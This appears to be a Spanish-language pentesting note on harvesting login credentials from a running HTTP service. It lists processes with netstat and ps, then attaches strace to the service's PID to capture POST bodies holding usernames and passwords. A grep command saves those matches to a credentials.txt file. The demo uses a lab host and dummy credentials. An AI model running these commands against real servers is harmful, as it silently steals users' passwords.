Dump HTTP Credentials
Esta t茅cnica est谩 pensada para casos en los que tienes strace, un proceso HTTP y quieres interceptar los paquetes para obtener las credenciales que un usuario puede estar ingresando en un login, esto es 煤til si eres el usuario propietario del proceso o si eres root. Esto funciona para HTTP o HTTPS.
Identificando el PID del Servicio
netstat -putona
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 127.0.0.1:43493 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 127.0.0.1:4040 0.0.0.0:* LISTEN 86230/ngrok off (0.00/0/0)
tcp 0 0 127.0.0.1:36023 0.0.0.0:* LISTEN 2904/Code --standar off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp6 0 0 :::3389 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 127.0.0.1:34103 :::* LISTEN 5156/java off (0.00/0/0)
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 5156/java off (0.00/0/0)
tcp6 0 0 ::1:3350 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 2001:1388:13a7:cf:48056 2600:1f1e:4e5:1::6e:443 ESTABLISHED 86230/ngrok keepalive (6.67/0/0)
udp 0 0 192.168.1.41:68 192.168.1.1:67 ESTABLISHED - off (0.00/0/0)
udp 0 0 224.0.0.251:5353 0.0.0.0:* 5358/chrome --disab off (0.00/0/0)
udp6 0 0 fe80::b625:3910:980:546 :::* - off (0.00/0/0)
Tambien podemos identificarlo con ps -aux
root 88312 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/6:2-mm_percpu_wq]
root 88313 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/5:2-rcu_gp]
dsds 88389 0.0 0.1 1186390240 64836 ? Sl Apr10 0:00 /home/dsds/BurpSuitePro/burpbrowser/122.0.6261.111/chrome --type=renderer --crashpad-handler-pid=5361 --enable-crash-reporter=, --user-
root 88502 0.8 0.1 260876 37652 pts/0 Sl+ Apr10 0:55 /home/dsds/ponencias/dragon-jar/api/env/bin/python3 app.py
root 88857 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/11:3-cgroup_destroy]
root 89074 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/8:1-events]
root 89553 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/12:1-cgroup_destroy]
root 89555 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/14:0-mm_percpu_wq]
Podemos identificar el PID el cual es: 88502.
Dumpeamos el proceso para obtener las request
strace -e trace=network -s 1024 -fp 88502 2>&1
Identificamos el endpoint
# strace -e trace=network -s 1024 -fp 88502 2>&1
strace: Process 88502 attached with 2 threads
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88503] accept4(4, {sa_family=AF_INET, sin_port=htons(56866), sin_addr=inet_addr("192.168.1.41")}, [16], SOCK_CLOEXEC) = 5
[pid 88503] getsockname(5, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.168.1.41")}, [128 => 16]) = 0
strace: Process 165519 attached
[pid 165519] recvfrom(5, "POST /api/login HTTP/1.1\r\nHost: lab-cors.local\r\nContent-Length: 42\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nOrigin: http://lab-cors.local\r\nReferer: http://lab-cors.local/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n{\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"}", 8192, 0, NULL, NULL) = 439
[pid 165519] sendto(5, "HTTP/1.1 401 UNAUTHORIZED\r\nServer: Werkzeug/3.0.2 Python/3.11.2\r\nDate: Thu, 11 Apr 2024 05:40:10 GMT\r\nContent-Type: application/json\r\nContent-Length: 42\r\nConnection: close\r\n\r\n", 175, 0, NULL, 0) = 175
[pid 165519] sendto(5, "{\n \"error\": \"Credenciales incorrectas\"\n}\n", 42, 0, NULL, 0) = 42
[pid 165519] shutdown(5, SHUT_WR) = 0
[pid 165519] +++ exited with 0 +++
Identificamos las credenciales {\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"}, y luego con ello podemos identificar el endpoint /api/login.
Tambi茅n podemos identificar este endpoint desde un proxy como burpsuite.
Luego podemos configurar el paremetro -s para que muestre el request completo en caso de necesitarlo.
Afinando el comando
Podemos tener un comando con el parametro exacto.
strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login

O sino, tambien podemos almacenar esto en un archivo:
(strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login) > credentials.txt
Last updated